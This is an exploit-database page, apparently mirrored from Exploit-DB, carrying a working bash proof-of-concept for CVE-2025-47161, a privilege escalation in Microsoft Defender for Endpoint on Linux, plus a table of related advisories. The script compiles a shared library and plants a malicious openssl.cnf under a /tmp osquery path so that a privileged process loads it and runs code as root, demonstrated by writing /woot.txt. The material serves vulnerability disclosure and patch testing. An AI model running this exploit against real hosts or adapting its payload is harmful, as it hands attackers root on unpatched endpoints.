Vulners
Lucene search
Microsoft Defender for Endpoint (MDE) - Elevation of Privilege
๐๏ธย 08 Jul 2025ย 00:00:00Reported byย Rich MirchTypeย 
ย exploitdb๐ย www.exploit-db.com๐ย 281ย Views
| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
 | CVE-2025-47161 | 15 May 202519:33 | โ | circl |
 | Microsoft Defender for Endpoint ่ฎฟ้ฎๆงๅถ้่ฏฏๆผๆด | 15 May 202500:00 | โ | cnnvd |
 | CVE-2025-47161 | 15 May 202519:21 | โ | cve |
 | CVE-2025-47161 Microsoft Defender for Endpoint Elevation of Privilege Vulnerability | 15 May 202519:21 | โ | cvelist |
 | EUVD-2025-15199 | 3 Oct 202520:07 | โ | euvd |
 | KLA83714 PE vulnerability in Microsoft System Center | 15 May 202500:00 | โ | kaspersky |
 | Microsoft Defender for Endpoint Elevation of Privilege Vulnerability | 15 May 202507:00 | โ | mscve |
 | CVE-2025-47161 | 15 May 202520:16 | โ | nvd |
 | CVE-2025-47161 | 15 May 202520:16 | โ | osv |
 | ๐ Microsoft Defender for Endpoint Privilege Escalation | 9 Jul 202500:00 | โ | packetstorm |
10
#!/bin/bash
# Exploit Title: Microsoft Defender for Endpoint (MDE) - Elevation of Privilege
# Date: 2025-05-27
# Exploit Author: Rich Mirch
# Vendor Homepage: https://learn.microsoft.com/en-us/defender-endpoint/
# Software Link:
https://learn.microsoft.com/en-us/defender-endpoint/microsoft-defender-endpoint-linux
# Versions:
# Vulnerable March-2025 Build: 101.25012.0000 30.125012.0000.0
# Vulnerable Feb-2025 Build: 101.24122.0008 20.124112.0008.0
# Vulnerable Feb-2025 Build: 101.24112.0003 30.124112.0003.0
# Vulnerable Jan-2025 Build: 101.24112.0001 30.124112.0001.0
# Vulnerable Jan-2025 Build: 101.24102.0000 30.124102.0000.0
#
# Vendor Advisory:
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-47161
# Blog: http://stratascale.com/vulnerability-alert-cve202547161
# Tested on: Ubuntu 24.04.1 LTS and 24.04.2 LTS
# CVE : CVE-2025-47161
#
echo "MDE Version: $(mdatp version)"
# stage
cat >mde-exp.c<<EOF
/*
* Build procedure:
* gcc -fPIC -o woot.o -Wall -c woot.c
* gcc -Wall -shared -Wl,-soname,woot.so -Wl,-init,woot -o /tmp/woot.so woot.o
*/
#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/stat.h>
void woot(){
// for manual testing
if(isatty(STDERR_FILENO)) {
fprintf(stderr,"Woot!\n");
}
system("ps -ef > /woot.txt");
sleep(3000000);
}
EOF
# build exploit
gcc -fPIC -o woot.o -Wall -c mde-exp.c
gcc -Wall -shared -Wl,-soname,woot.so -Wl,-init,woot -o /tmp/woot.so woot.o
mkdir -p /tmp/build/osquery/build/installed_formulas/openssl/etc/openssl/
cat > /tmp/build/osquery/build/installed_formulas/openssl/etc/openssl/openssl.cnf
<<EOF
# Malicious openssl.cnf
openssl_conf = openssl_init
[openssl_init]
engines = engine_section
[engine_section]
woot = woot_section
[woot_section]
engine_id = woot
dynamic_path = /tmp/woot.so
init = 0
EOF
echo "Checking every 15 seconds for /woot.txt"
while true
do
if [[ -f /woot.txt ]]
then
echo "WOOT - /woot.txt exists"
ls -ld /woot.txt
exit
fi
sleep 15
doneData
Build on a solid foundation withย Vulners data
Weย provide theย essential building blocks forย cybersecurity solutions withย comprehensive, structured, andย constantly updated vulnerability andย exploits data
Api
Power your application withย Vulners API
The Vulners REST API offers reliable, high-performance access toย vulnerabilityย intelligence, withย 99.9%ย SLAย uptime andย CDN-backed data delivery forย seamlessย global access
App
Assess and manage vulnerabilities withย Vulnersย tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
08 Jul 2025 00:00Current
6.5Medium risk
Vulners AI Score6.5
CVSS 3.17.8
EPSS0.04361
SSVC